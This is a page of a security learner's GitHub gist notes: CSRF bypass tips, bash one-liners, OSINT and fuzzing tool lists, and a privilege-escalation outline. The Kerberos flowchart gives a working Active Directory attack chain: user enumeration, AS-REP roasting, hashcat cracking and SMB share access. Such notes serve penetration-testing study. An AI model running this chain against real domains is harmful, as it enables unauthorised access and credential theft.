Sandro Braidotti abraidotti

abraidotti / rhynorators-web-app-test-tips.md
Last active October 28, 2022 17:23
Rhynorator's Web app test tips

https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w

  1. How is CSRF protection implemented? Does the application use only application/json content-type? Can you convert {"name":"Justin"} to name=Justin and change the content-type? Is CSRF token tied to account? Session? Are there any "unauthed" CSRF tokens? Can you switch POST -> GET? If not, what are you getting? If 405, then it is parsing the route, but GET is disallowed at this endpoint. Try other endpoints.

  2. Is caching implemented?

@abraidotti
abraidotti / bash-one-liners.md
Created October 18, 2022 19:22
bash one liners

remove the last character of every line of a file, in place (e.g. a stray trailing character):

sed -i 's/.$//' file

ping every line in a file (xargs -I is the current spelling; -i is deprecated):

xargs -I% ping -c 1 % < file

ping every host in a file, extract the resolved IPs from the PING header line and save them:

xargs -I{} timeout 2 ping -q -c 2 {} < DOMAINS.txt | awk -F'[()]' '/PING/{print $2}' | tee IPs.txt

sort uniques in a file and replace the file

@abraidotti
abraidotti / kerberos-hacking-v1.md
Last active February 26, 2022 15:35
Kerberos Hacking
graph TD
    kerberos-hacking-v1
    1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
    A[is kerberos running? -- typically port 88] --> B
    B[find Active Directory domain names] --> |enum4linux $IP| C
    C[enumerate AD users] --> |kerbrute userenum --dc $IP -d $AD-DOMAIN /path/to/wordlist.txt| D
    D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
    E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
    F[find SMB shares with the cracked password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G

0xConda's Linux Privilege Escalation mindmap

source 😽

Credential Access

  • reused passwords

  • credentials from configuration files

@abraidotti
abraidotti / 0xConda-linux-priv-esc
Created January 20, 2022 15:15
0xConda's Linux Privilege Escalation mind map
# 0xConda's Linux Privilege Escalation mindmap
## Credential Access
- reused passwords
- credentials from configuration files
- credentials from local db
@abraidotti
abraidotti / app_dev_101_with_sandro.md
Created September 2, 2020 19:12
App Development 101 with Sandro

App Development 101 with Sandro

preliminaries

  • how I look up everything I don't know

  • how I consume and create open-source software

  • how I set goals and don't burn out

@abraidotti
abraidotti / hacking_101_with_sandro.md
Last active September 2, 2020 16:25
Hacking 101 with Sandro

hacking 101

a couple of different thought threads...

Concepts to learn first

http

ports

@abraidotti
abraidotti / osint_tools.md
Last active September 2, 2020 15:44
OSINT tools

Some common OSS OSINT tools

Pretty much built into Linux

whois

nslookup

dig

@abraidotti
abraidotti / app_fuzzing_tools.md
Last active March 25, 2024 19:34
Application Fuzzing Tools

Application Fuzzing Tools

Fuzzing is the act of testing software for vulnerabilities by injecting mutated or iterated data.

This gist mostly lists tools for web app fuzzing, but a couple for binary file fuzzing too.

Context

The general SOP for app fuzzing seems to be: recon, then enumeration, then fuzzing.

@abraidotti
abraidotti / ks-readme-template.md
Last active September 28, 2020 14:43
Kintyre README template